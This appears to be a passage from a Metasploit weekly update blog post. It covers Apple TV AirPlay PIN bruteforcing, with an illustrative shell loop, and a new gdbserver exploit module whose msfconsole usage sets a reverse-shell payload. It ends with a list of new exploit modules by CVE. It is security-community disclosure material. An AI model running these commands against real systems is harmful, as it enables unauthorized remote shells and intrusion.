What's the risk? Well, if the display is in some public location and is being used for Serious Business(tm), a prankster can of course cause all kinds of hijinks, from the obvious (fill in your own shocking WTF image here) to the subtle (how about quietly replacing one financial results spreadsheet with another, on the fly?). Ultimately, though, we hope that research like this brings some awareness to the coming Internet of Things and how we're apparently about to have tons and tons of these not-computer computers on our networks, just begging to be entry points for evil-doers.
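To put a number on "trivially bruteforced": a four-digit PIN gives exactly 10,000 candidates, a keyspace a script can walk through in minutes. The sketch below only counts the candidates; the URL and the commented-out curl call are placeholders to show the shape of such a loop, not the actual AirPlay handshake the Metasploit login module speaks.

```shell
# Enumerate the entire keyspace of a 4-digit OnScreen PIN (placeholder logic;
# the real AirPlay authentication exchange is what the Metasploit module does).
target='http://appletv.local:7000/login'   # hypothetical endpoint
tried=0
for pin in $(seq -w 0 9999); do            # 0000 through 9999, zero-padded
  # curl -s -o /dev/null -u "AirPlay:$pin" "$target"   # a real attempt
  tried=$((tried + 1))
done
echo "candidate PINs tried: $tried"
```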
If Apple and Google, who are massive players in this IoT space, can't be bothered to engineer some kind of sensible and user-friendly security-by-design into these things, how can we possibly expect newcomers with the next big IoT fad to fare any better?

The GDB Protocol

Last week, we added a new exploit module, "GDB Server Remote Payload Execution". If you've ever scanned a network full of developers, you might discover gdbserver, an unauthenticated remote service that allows developers to debug code in their kernel or on a different machine. Because of the nature of gdbserver, getting a shell is pretty straightforward: write a payload somewhere in RWX memory and execute it. To make things easier for a pentester, we implemented a few parts of the gdbserver protocol in the Msf::Exploit::Remote::Gdb mixin, so any module can leverage it.

There are lots of ways to get a shell from gdbserver, and there are lots of options that the remote service may or may not support. In addition, the service might be an independent gdbserver binary running on the remote host (possibly not even attached to a program), or it might be a "remote stub" that is compiled into an application or kernel. Stubs usually support only a minimal set of features, so we made sure the exploit module uses only features in the required set. The exploit is pretty flexible: it discovers $PC, writes the payload, and continues execution. This is a rather destructive approach (since the original program will have memory contents overwritten), but since it is gdbserver, we at least won't crash the target - just hang it if an interrupt or exception is thrown. Here's how to run the module against an arbitrary x86 Linux box:

msf> use exploits/multi/gdb/gdb_server_exec
msf> set payload linux/x86/shell_reverse_tcp
msf> set LHOST
msf> run

Right now, x86 and x86_64 targets (of any platform) are supported, but it would be very easy to extend to other architectures. Feel free to do so!

Hack my Dogecoin (Such Doxing.
Wow.)

This week, my DEF CON interview with Alicia Mae Webb went up on SecureNinjaTV. Feel free to watch the whole thing, in which I talk about how great the Metasploit open source community is and then demo the infamous addJavascriptInterface vulnerability on a very popular browser available today on the Google Play store. I'm really kind of annoyed that this bug is so long-lived. While it has apparently been blocked in the very latest Android 4.4.4 (according to Android Tamer), it's basically a backdoor into any sub-4.4.4 Android version out there today -- that's at least 75% of all Android devices (anyone running less than 4.4). Android 4.4.4 was posted in mid-June of 2014, but of course, not all carriers have picked it up yet, and not all eligible users have updated. Be sure to check whether you can pick it up via your phone's usual over-the-air (OTA) update process.

Alternatively, don't pay any attention to that bit at all, and just skip ahead to about the 9:40 mark and watch as I disclose my own Dogecoin wallet private key. Yes, it's encrypted, but a careful transcriber of the shown characters should be able to crack the password pretty quickly, given the right bruteforcing techniques. So, take this as a challenge: if you can crack my private key, feel free to take the Dogecoin as a reward, and even better, let me (and the rest of the world) know how you did it. I'm curious what approach you take. Which reminds me, I need to update Metasploit's Bitcoin Jacker to be more cryptocurrency (and host OS) agnostic.

New Modules

Including the modules discussed above, we have nine new modules this week. In fact, this week, we surpassed 1337 exploits! That's fun.
Exploit modules

- Railo Remote File Include by Bryan Alexander and bperry exploits CVE-2014-5468
- GDB Server Remote Payload Execution by joev
- ManageEngine Eventlog Analyzer Arbitrary File Upload by Pedro Ribeiro and h0ng10 exploits CVE-2014-6037
- SolarWinds Storage Manager Authentication Bypass by juan vazquez and rgod exploits ZDI-14-299
- ManageEngine Desktop Central StatusUpdate Arbitrary File Upload by Pedro Ribeiro exploits CVE-2014-5005

Auxiliary and post modules

- Apple TV Image Remote Control by sinn3r and 0a29406d9794e4f9b30b3c5d6702c708
- Apple TV Video Remote Control by sinn3r and 0a29406d9794e4f9b30b3c5d6702c708
- AppleTV AirPlay Login Utility by 0a29406d9794e4f9b30b3c5d6702c708 and thelightcosine
- Android Open Source Platform (AOSP) Browser UXSS by joev and Rafay Baloch exploits CVE-2014-6041
- Arris DG950A Cable Modem Wifi Enumeration by Deral "Percent_X" Heiland

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration. For additional details on what's changed and what's current, please see Chris Doughty's most excellent release notes.
